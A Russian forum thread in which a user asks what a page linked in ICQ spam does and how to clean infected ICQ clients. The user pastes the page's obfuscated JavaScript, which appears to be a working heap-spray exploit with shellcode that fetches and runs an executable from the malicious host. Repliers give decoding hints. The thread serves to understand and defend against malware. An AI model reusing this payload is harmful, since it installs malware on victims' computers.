Случайным поиском в асе нашел пользователя с UIN 232764281. Но каждый раз как я пользователю что то писал, выскакивала ссылка, иногда новая. Вот перешел я по ней включив Нод на всю катушку, и он как взревет! Вот ссылка http://ourmall.net/flower.html.
txvToeJPcAmkExO[1].txt - 32/TrojanDownloader.Ani.Gen. В хтмл виде видно что на странице выполняется скрипт.. только хз какой.
<script> document.write(unescape("\%3C\%53\%43\%52\%49\%50\%54\%20\%6C\%61\%6E\%67\% 75\%61\%67\%65\%3D\%22\%6A\%61\%76\%61\%73\%63\%72 \%69\%70\%74\%22\%3E\%0A\%09\%76\%61\%72\%20\%70\% 61\%41\%62\%46\%75\%66\%4E\%49\%20\%3D\%20\%30\%78 \%30\%37\%30\%30\%30\%30\%30\%30\%3B\%0A\%09\%76\% 61\%72\%20\%50\%74\%62\%6A\%46\%46\%62\%75\%6A\%56 \%72\%6A\%59\%42\%4F\%6F\%47\%67\%6D\%62\%43\%20\% 3D\%20\%75\%6E\%65\%73\%63\%61\%70\%65\%28\%22\%25 \%75\%35\%34\%65\%62\%25\%75\%37\%35\%38\%62\%25\% 75\%38\%62\%33\%63\%25\%75\%33\%35\%37\%34\%25\%75 \%30\%33\%37\%38\%25\%75\%35\%36\%66\%35\%25\%75\% 37\%36\%38\%62\%25\%75\%30\%33\%32\%30\%25\%75\%33 \%33\%66\%35\%25\%75\%34\%39\%63\%39\%25\%75\%61\% 64\%34\%31\%25\%75\%64\%62\%33\%33\%25\%75\%30\%66 \%33\%36\%25\%75\%31\%34\%62\%65\%25\%75\%33\%38\% 32\%38\%25\%75\%37\%34\%66\%32\%25\%75\%63\%31\%30 \%38\%25\%75\%30\%64\%63\%62\%25\%75\%64\%61\%30\% 33\%25\%75\%65\%62\%34\%30\%25\%75\%33\%62\%65\%66 \%25\%75\%37\%35\%64\%66\%25\%75\%35\%65\%65\%37\% 25\%75\%35\%65\%38\%62\%25\%75\%30\%33\%32\%34\%25 \%75\%36\%36\%64\%64\%25\%75\%30\%63\%38\%62\%25\% 75\%38\%62\%34\%62\%25\%75\%31\%63\%35\%65\%25\%75 \%64\%64\%30\%33\%25\%75\%30\%34\%38\%62\%25\%75\% 30\%33\%38\%62\%25\%75\%63\%33\%63\%35\%25\%75\%37 \%32\%37\%35\%25\%75\%36\%64\%36\%63\%25\%75\%36\% 65\%36\%66\%25\%75\%36\%34\%32\%65\%25\%75\%36\%63 \%36\%63\%25\%75\%32\%65\%30\%30\%25\%75\%35\%63\% 32\%65\%25\%75\%32\%65\%34\%65\%25\%75\%37\%38\%36 \%35\%25\%75\%30\%30\%36\%35\%25\%75\%63\%30\%33\% 33\%25\%75\%30\%33\%36\%34\%25\%75\%33\%30\%34\%30 \%25\%75\%30\%63\%37\%38\%25\%75\%34\%30\%38\%62\% 25\%75\%38\%62\%30\%63\%25\%75\%31\%63\%37\%30\%25 \%75\%38\%62\%61\%64\%25\%75\%30\%38\%34\%30\%25\% 75\%30\%39\%65\%62\%25\%75\%34\%30\%38\%62\%25\%75 \%38\%64\%33\%34\%25\%75\%37\%63\%34\%30\%25\%75\% 34\%30\%38\%62\%25\%75\%39\%35\%33\%63\%25\%75\%38 \%65\%62\%66\%25\%75\%30\%65\%34\%65\%25\%75\%65\% 38\%65\%63\%25\%75\%66\%66\%38\%34\%25\%75\%66\%66 \%66\%66\%25\%75\%65\%63\%38\%33\%25\%75\%38\%33\% 30\%34\%25\%75\%32\%34\%32\%63\%25\%75\%66\%66\%33 \%63\%25\%75\%39\%35\%64\%30\%25\%75\%62\%66\%35\% 30\%25\%75\%31\%61\%33\%36\%25\%75\%37\%30\%32\%66 \%25\%75\%36\%66\%65\%38\%25\%75\%66\%66\%66\%66\% 25\%75\%38\%62\%66\%66\%25\%75\%32\%34\%35\%34\%25 \%75\%38\%64\%66\%63\%25\%75\%62\%61\%35\%32\%25\% 75\%64\%62\%33\%33\%25\%75\%35\%33\%35\%33\%25\%75 \%65\%62\%35\%32\%25\%75\%35\%33\%32\%34\%25\%75\% 64\%30\%66\%66\%25\%75\%62\%66\%35\%64\%25\%75\%66 \%65\%39\%38\%25\%75\%30\%65\%38\%61\%25\%75\%35\% 33\%65\%38\%25\%75\%66\%66\%66\%66\%25\%75\%38\%33 \%66\%66\%25\%75\%30\%34\%65\%63\%25\%75\%32\%63\% 38\%33\%25\%75\%36\%32\%32\%34\%25\%75\%64\%30\%66 \%66\%25\%75\%37\%65\%62\%66\%25\%75\%65\%32\%64\% 38\%25\%75\%65\%38\%37\%33\%25\%75\%66\%66\%34\%30 \%25\%75\%66\%66\%66\%66\%25\%75\%66\%66\%35\%32\% 25\%75\%65\%38\%64\%30\%25\%75\%66\%66\%64\%37\%25 \%75\%66\%66\%66\%66\%25\%75\%37\%34\%36\%38\%25\% 75\%37\%30\%37\%34\%25\%75\%32\%66\%33\%61\%25\%75 \%36\%66\%32\%66\%25\%75\%37\%32\%37\%35\%25\%75\% 36\%31\%36\%64\%25\%75\%36\%63\%36\%63\%25\%75\%36 \%65\%32\%65\%25\%75\%37\%34\%36\%35\%25\%75\%36\% 35\%32\%66\%25\%75\%36\%35\%37\%38\%25\%75\%36\%39 \%36\%36\%25\%75\%36\%35\%36\%63\%25\%75\%36\%35\% 32\%65\%25\%75\%36\%35\%37\%38\%25\%75\%30\%30\%30 \%30\%22\%29\%3B\%0A\%09\%76\%61\%72\%20\%61\%4B\% 47\%53\%4D\%6E\%4A\%45\%6A\%6B\%20\%3D\%20\%30\%78 \%34\%30\%30\%30\%30\%30\%3B\%0A\%09\%76\%61\%72\% 20\%66\%63\%71\%68\%68\%57\%55\%6C\%6E\%78\%20\%3D \%20\%50\%74\%62\%6A\%46\%46\%62\%75\%6A\%56\%72\% 6A\%59\%42\%4F\%6F\%47\%67\%6D\%62\%43\%2E\%6C\%65 \%6E\%67\%74\%68\%20\%2A\%20\%34\%3B\%0A\%09\%76\% 61\%72\%20\%71\%50\%67\%73\%56\%64\%6E\%52\%78\%4B \%20\%3D\%20\%61\%4B\%47\%53\%4D\%6E\%4A\%45\%6A\% 6B\%20\%2D\%20\%28\%66\%63\%71\%68\%68\%57\%55\%6C \%6E\%78\%2B\%30\%78\%33\%38\%29\%3B\%0A\%09\%76\% 61\%72\%20\%55\%56\%67\%75\%75\%74\%45\%64\%55\%78 \%20\%3D\%20\%75\%6E\%65\%73\%63\%61\%70\%65\%28\% 22\%25\%75\%34\%31\%34\%31\%25\%75\%34\%31\%34\%31 \%22\%29\%3B\%0A\%09\%55\%56\%67\%75\%75\%74\%45\% 64\%55\%78\%20\%3D\%20\%4E\%4F\%44\%58\%4A\%43\%79 \%77\%65\%55\%6E\%67\%28\%55\%56\%67\%75\%75\%74\% 45\%64\%55\%78\%2C\%71\%50\%67\%73\%56\%64\%6E\%52 \%78\%4B\%29\%3B\%0A\%09\%54\%4F\%6E\%47\%53\%43\% 6C\%44\%41\%55\%49\%46\%20\%3D\%20\%28\%70\%61\%41 \%62\%46\%75\%66\%4E\%49\%20\%2D\%20\%30\%78\%31\% 30\%30\%30\%30\%30\%29\%2F\%61\%4B\%47\%53\%4D\%6E \%4A\%45\%6A\%6B\%3B\%0A\%09\%6D\%65\%6D\%6F\%72\% 79\%20\%3D\%20\%6E\%65\%77\%20\%41\%72\%72\%61\%79 \%28\%29\%3B\%0A\%09\%66\%6F\%72\%20\%28\%69\%3D\% 30\%3B\%69\%3C\%54\%4F\%6E\%47\%53\%43\%6C\%44\%41 \%55\%49\%46\%3B\%69\%2B\%2B\%29\%0A\%09\%7B\%0A\% 09\%09\%6D\%65\%6D\%6F\%72\%79\%5B\%69\%5D\%20\%3D \%20\%55\%56\%67\%75\%75\%74\%45\%64\%55\%78\%20\% 2B\%20\%50\%74\%62\%6A\%46\%46\%62\%75\%6A\%56\%72 \%6A\%59\%42\%4F\%6F\%47\%67\%6D\%62\%43\%3B\%0A\% 09\%7D\%0A\%09\%64\%6F\%63\%75\%6D\%65\%6E\%74\%2E \%77\%72\%69\%74\%65\%28\%22\%3C\%48\%54\%4D\%4C\% 3E\%3C\%42\%4F\%44\%59\%20\%73\%74\%79\%6C\%65\%3D \%5C\%22\%43\%55\%52\%53\%4F\%52\%3A\%20\%75\%72\% 6C\%28\%27\%74\%78\%76\%54\%6F\%65\%4A\%50\%63\%41 \%6D\%6B\%45\%78\%4F\%2E\%4D\%76\%5A\%74\%77\%69\% 43\%44\%7A\%64\%6E\%67\%6B\%48\%71\%27\%29\%5C\%22 \%3E\%20\%20\%20\%20\%3C\%2F\%42\%4F\%44\%59\%3E\% 3C\%2F\%48\%54\%4D\%4C\%3E\%22\%29\%0A\%09\%66\%75 \%6E\%63\%74\%69\%6F\%6E\%20\%4E\%4F\%44\%58\%4A\% 43\%79\%77\%65\%55\%6E\%67\%28\%55\%56\%67\%75\%75 \%74\%45\%64\%55\%78\%2C\%20\%71\%50\%67\%73\%56\% 64\%6E\%52\%78\%4B\%29\%0A\%09\%7B\%0A\%09\%09\%77 \%68\%69\%6C\%65\%20\%28\%55\%56\%67\%75\%75\%74\% 45\%64\%55\%78\%2E\%6C\%65\%6E\%67\%74\%68\%2A\%32 \%3C\%71\%50\%67\%73\%56\%64\%6E\%52\%78\%4B\%29\% 0A\%09\%09\%7B\%0A\%09\%09\%09\%55\%56\%67\%75\%75 \%74\%45\%64\%55\%78\%20\%2B\%3D\%20\%55\%56\%67\% 75\%75\%74\%45\%64\%55\%78\%3B\%0A\%09\%09\%7D\%0A \%09\%09\%55\%56\%67\%75\%75\%74\%45\%64\%55\%78\% 20\%3D\%20\%55\%56\%67\%75\%75\%74\%45\%64\%55\%78 \%2E\%73\%75\%62\%73\%74\%72\%69\%6E\%67\%28\%30\% 2C\%71\%50\%67\%73\%56\%64\%6E\%52\%78\%4B\%2F\%32 \%29\%3B\%0A\%09\%09\%72\%65\%74\%75\%72\%6E\%20\% 55\%56\%67\%75\%75\%74\%45\%64\%55\%78\%3B\%0A\%09 \%7D\%0A\%3C\%2F\%53\%43\%52\%49\%50\%54\%3E\%0A"));</script>
Кто может обьяснить что это и как устроено? + желательно расшифровать )

это HEX.
write на alert замени....

Кстати, сейчас у многих моих знакомых такая байда, что когда им пишут, а чаще они пишут, так же выскакивает ссылка. Я так понимаю что у них заражен Icq клиент. Есть идеи как это вылечить?

Можно поконкретнее о коде, выполняемом на странице? и как он записывает файл на комп?

как как...ответ сам напрашивается...антивирусн� �ком.

Антивирус ничегошеньки ненаходит. Ни нод ни Каспер

Йо мен, спасибо! А чем расшифровывал? Объясни дитю)

Энто хеккеры хотят чтобы в клиенте высветился хтмл код?:)))))